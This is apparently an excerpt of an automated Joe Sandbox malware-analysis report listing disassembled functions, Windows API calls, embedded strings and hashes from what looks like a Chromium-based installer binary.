                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$program-files-installation$promostat$system-level$uac
                                                                                                                        • API String ID: 2631407230-3225624203
                                                                                                                        • Opcode ID: 91a2007cd154ca9a0e704d3af5874ae5bd68cee5036c8fadbe54b7b5386ed85e
                                                                                                                        • Instruction ID: edb0d62884502a6f2d7a65c5f358e1d61564c90c0378e54af273c7a69f8c9149
                                                                                                                        • Opcode Fuzzy Hash: 91a2007cd154ca9a0e704d3af5874ae5bd68cee5036c8fadbe54b7b5386ed85e
                                                                                                                        • Instruction Fuzzy Hash: CE615972D0021A5BDF14AAA4D891BEFB7B9FF85315F090235EC05F7282E6215D0987E3
                                                                                                                        Function 00894CC0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 148COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894D4D
                                                                                                                        • __Init_thread_header.LIBCMT ref: 00894F85
                                                                                                                          • Part of subcall function 008FFBA7: EnterCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBB2
                                                                                                                          • Part of subcall function 008FFBA7: LeaveCriticalSection.KERNEL32(00963AB4,?,?,?,008C892C,0097139C,00000000,?,?,?,?,008C86AD,00000000,00000000), ref: 008FFBEF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalInit_thread_headerSection$EnterLeave
                                                                                                                        • String ID: Friday$Monday$Saturday$Sunday$Thursday$Tuesday$Wednesday
                                                                                                                        • API String ID: 3100837274-1471634407
                                                                                                                        • Opcode ID: a91db9349b147be2bdab862ec00a280c9dae9e7da23c1771054ea6746f8a144c
                                                                                                                        • Instruction ID: a64ddff1b05386a0cdd166c324bee74ba02eafb9cb0e035176a832ca57cbe00b
                                                                                                                        • Opcode Fuzzy Hash: a91db9349b147be2bdab862ec00a280c9dae9e7da23c1771054ea6746f8a144c
                                                                                                                        • Instruction Fuzzy Hash: 16617A70618B40CFEB21AF18E859F153BE0F701B98F1A81ADE1158F3A2CBF55845AB52
                                                                                                                        Function 008A0470 Relevance: 15.4, APIs: 10, Instructions: 361COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008A047F
                                                                                                                          • Part of subcall function 008CE2A0: __Init_thread_header.LIBCMT ref: 008CE2D9
                                                                                                                          • Part of subcall function 008CE2A0: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,008A048D), ref: 008CE2FB
                                                                                                                          • Part of subcall function 008CE2A0: GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 008CE307
                                                                                                                          • Part of subcall function 008CE2A0: GetCurrentProcess.KERNEL32(?,?,008A048D), ref: 008CE31C
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 008A04E6
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 008A0504
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 008A0583
                                                                                                                          • Part of subcall function 008A08C0: GetCurrentProcess.KERNEL32(?,?,?,008A06F2), ref: 008A08CE
                                                                                                                          • Part of subcall function 008A08C0: K32GetProcessMemoryInfo.KERNEL32(00000000,?,0000002C,?,008A06F2), ref: 008A08D7
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 008A075E
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 008A0860
                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 008A0878
                                                                                                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 008A088E
                                                                                                                        • GetLastError.KERNEL32 ref: 008A089F
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 008A08B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$ErrorLast$Handle$AddressCloseInfoInit_thread_headerMemoryModuleNextOpenProcProcess32
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4004825158-0
                                                                                                                        • Opcode ID: e4de030808859dd84ff8ec53720fc54a1a285b7e500986f608e10c8d518d58c7
                                                                                                                        • Instruction ID: 2234a4bbf338b7efd7e01784a40617fd65ef11efd2453513b8ada80e04a3bf96
                                                                                                                        • Opcode Fuzzy Hash: e4de030808859dd84ff8ec53720fc54a1a285b7e500986f608e10c8d518d58c7
                                                                                                                        • Instruction Fuzzy Hash: 56D15CB5C003189BDF10EFA4D846ADEB7B8FF49704F140469E905E7252EB34AA49CF92
                                                                                                                        Function 008C6C00 Relevance: 15.2, APIs: 6, Strings: 4, Instructions: 182COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008C6DCC
                                                                                                                        • GetLastError.KERNEL32(Failed to destroy crypt key, error: ,00952FE8,00000001,Cleanup,0000007A,?), ref: 008C6E04
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Cleanup$Failed to destroy crypt key, error: $Failed to destroy, error: $Failed to release crypt context, error:
                                                                                                                        • API String ID: 1452528299-3823038814
                                                                                                                        • Opcode ID: db674add04ceee5c866370516e85a8d3d909efab7fa521896c658d983140c43f
                                                                                                                        • Instruction ID: a374e26e81638a22623840b9fb8649bbf9d353bfe030bb86ccd8ddc877277cdc
                                                                                                                        • Opcode Fuzzy Hash: db674add04ceee5c866370516e85a8d3d909efab7fa521896c658d983140c43f
                                                                                                                        • Instruction Fuzzy Hash: 1551A471608341AFD710EB65DC82F2B7BA5FF81B04F04482CF995D6292EB71E9189B63
                                                                                                                        Function 008FC4A0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 360COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008FC8C6
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 008FC85D
                                                                                                                        • string_view::substr, xrefs: 008FC8BC
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr, xrefs: 008FC892
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008FC87B
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008FC8D5
                                                                                                                        • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 008FC86C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$..\..\third_party\libc++\src\include\string_view:533: assertion __s.size() == 0 || __s.data() != nullptr failed: string_view::find_first_of(): received nullptr$string_view::substr
                                                                                                                        • API String ID: 0-3127841957
                                                                                                                        • Opcode ID: c4ae254353baaddcbba725211c2d8eb896d3ef980661cebeb26eb6ca14a305b8
                                                                                                                        • Instruction ID: bed7099c0d250f5106ef4cbda4c2c0e2123f6f6eda67f5483a238fc5c4ff9f1f
                                                                                                                        • Opcode Fuzzy Hash: c4ae254353baaddcbba725211c2d8eb896d3ef980661cebeb26eb6ca14a305b8
                                                                                                                        • Instruction Fuzzy Hash: 92D18271E0020E8BCB18DF78C990ABEB7B2FF98354F25812DE515E7241DB31AA45CB54
                                                                                                                        Function 008B08E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 146windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,008B0BE9,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 008B0908
                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008B0947
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,008B0BE9,?,?), ref: 008B0A73
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 008B0A43
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 008B0A4A
                                                                                                                        • (0x%lX), xrefs: 008B0958
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008B0A3C
                                                                                                                        • Error (0x%lX) while retrieving error. (0x%lX), xrefs: 008B0A7B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                        • String ID: (0x%lX)$..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:311: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:313: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Error (0x%lX) while retrieving error. (0x%lX)
                                                                                                                        • API String ID: 1365068426-2802836808
                                                                                                                        • Opcode ID: 1584adc09b2c134a77bdab71d08e31c15fdc01ca0c0636eedf8f71b80406a3ad
                                                                                                                        • Instruction ID: 25d534f37e499b5553e1e4156c2385cd32d1c500950b83fe840c613bd47519a0
                                                                                                                        • Opcode Fuzzy Hash: 1584adc09b2c134a77bdab71d08e31c15fdc01ca0c0636eedf8f71b80406a3ad
                                                                                                                        • Instruction Fuzzy Hash: FA41A3B1E04329AEDF009BA4CC45AFFBB78FF85704F044425F905F6252D730AA458BA2
                                                                                                                        Function 0092E290 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E2DA
                                                                                                                        • GetModuleHandleW.KERNEL32(wininet.dll), ref: 0092E308
                                                                                                                        • FormatMessageW.KERNEL32(00000800,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E326
                                                                                                                        • GetModuleHandleW.KERNEL32(urlmon.dll), ref: 0092E335
                                                                                                                        • FormatMessageW.KERNEL32(00000800,00000000,0092E400,00000409,?,00000400,00000000), ref: 0092E353
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatMessage$HandleModule
                                                                                                                        • String ID: unknown error 0x$urlmon.dll$wininet.dll
                                                                                                                        • API String ID: 1246395562-2593042846
                                                                                                                        • Opcode ID: 5b9abc322bcf2eba12c21dee529d9997df70933548f2c3a6337342f717c0f3ad
                                                                                                                        • Instruction ID: 17f1e5e0c13562c9a5c117e307bf86686d80a2a0fdbc41def4af55e5dfb9f9f6
                                                                                                                        • Opcode Fuzzy Hash: 5b9abc322bcf2eba12c21dee529d9997df70933548f2c3a6337342f717c0f3ad
                                                                                                                        • Instruction Fuzzy Hash: 423127B07443187EEB106B61AC4AFBB366DEF80B45F088424F646AA1C1DFB09C408BE5
                                                                                                                        Function 008E4460 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 008E449C
                                                                                                                        • IsWow64Process.KERNEL32(00000000), ref: 008E44A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$CurrentWow64
                                                                                                                        • String ID: $OutOfMemory$ize$mit$partition_root.cc$size
                                                                                                                        • API String ID: 1905925150-2901852355
                                                                                                                        • Opcode ID: cf5c6400c8bfb6c7d029d8b4f441c923a28cb51235681cb6aea63433a57f0e04
                                                                                                                        • Instruction ID: 5624b7d33f514a41fdfb5b57f9f4e530b6927c34f4afbe53954c50c75ba54ba3
                                                                                                                        • Opcode Fuzzy Hash: cf5c6400c8bfb6c7d029d8b4f441c923a28cb51235681cb6aea63433a57f0e04
                                                                                                                        • Instruction Fuzzy Hash: D0417DB49103409FD7049F29D889956BBE8FF8A308B19C46DE54DCB322D772D905CB92
                                                                                                                        Function 008488E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00848903
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00848925
                                                                                                                        • GetLastError.KERNEL32 ref: 00848934
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,00000000), ref: 008489AC
                                                                                                                        • GetLastError.KERNEL32 ref: 008489BE
                                                                                                                        Strings
                                                                                                                        • The elevated installer was terminated due to stop event., xrefs: 00848969
                                                                                                                        • RunModule, xrefs: 00848954, 008489DE
                                                                                                                        • Failed to get exit code of the elevated installer., xrefs: 008489F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CodeEventExitMultipleObjectsProcessWait
                                                                                                                        • String ID: Failed to get exit code of the elevated installer.$RunModule$The elevated installer was terminated due to stop event.
                                                                                                                        • API String ID: 3441567390-426593179
                                                                                                                        • Opcode ID: 0300cf8c979effec312d1236d2606caa411bef8a41f7570691d1b5287713d754
                                                                                                                        • Instruction ID: 77b63323d2884c15357eb7d8fffb3437c024436a5ab5b721da3b92f677a6c1d8
                                                                                                                        • Opcode Fuzzy Hash: 0300cf8c979effec312d1236d2606caa411bef8a41f7570691d1b5287713d754
                                                                                                                        • Instruction Fuzzy Hash: B73107B1608305AFDB10AB74DC46B2E7FA9FF80B14F004528F959D61D2DB70A905CB93
                                                                                                                        Function 008BC9F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetDllDirectoryW.KERNEL32(0094335A), ref: 008BCA04
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00832E5D,?), ref: 008BCA16
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 008BCA1E
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00832E5D,?), ref: 008BCA27
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008BCA2F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc$Directory
                                                                                                                        • String ID: SetDefaultDllDirectories$SetSearchPathMode$kernel32.dll
                                                                                                                        • API String ID: 3179712393-4265898095
                                                                                                                        • Opcode ID: 6077474048a8e2fd4d771747a09dca327bd8bde629da7d24c32e819c2fe483a9
                                                                                                                        • Instruction ID: cf3f387ddad35c1a3395e392148aa27ab7bd4c8711d58551a045004ae4bbb28c
                                                                                                                        • Opcode Fuzzy Hash: 6077474048a8e2fd4d771747a09dca327bd8bde629da7d24c32e819c2fe483a9
                                                                                                                        • Instruction Fuzzy Hash: 7601D6723543186BE7006B76AC48F7E3B98FB85BAAF140161F905C6290CE658C015BA9
                                                                                                                        Function 00914D20 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00915125: CreateFileW.KERNEL32(00000000,00000000,?,00914DC9,?,?,00000000,?,00914DC9,00000000,0000000C), ref: 00915142
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00914E34
                                                                                                                        • __dosmaperr.LIBCMT ref: 00914E3B
                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00914E47
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00914E51
                                                                                                                        • __dosmaperr.LIBCMT ref: 00914E5A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00914E7A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00914FC7
                                                                                                                        • GetLastError.KERNEL32 ref: 00914FF9
                                                                                                                        • __dosmaperr.LIBCMT ref: 00915000
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4237864984-0
                                                                                                                        • Opcode ID: 548b6e60df30f0002e1a12c4dd90cfeeb1cfbb451e2c0a0824c4f1758daa5187
                                                                                                                        • Instruction ID: 9b1ebf262658c4eb897b4d9fc56c96720da5d7c6e642dde7f55a992e69c41b87
                                                                                                                        • Opcode Fuzzy Hash: 548b6e60df30f0002e1a12c4dd90cfeeb1cfbb451e2c0a0824c4f1758daa5187
                                                                                                                        • Instruction Fuzzy Hash: 91A12432B146589FCF19AF68DC91BED3BA5AB4A310F15014DF8129F391CB349C92DB92
                                                                                                                        Function 0089C760 Relevance: 13.6, APIs: 9, Instructions: 72synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,009659FC), ref: 0089C77E
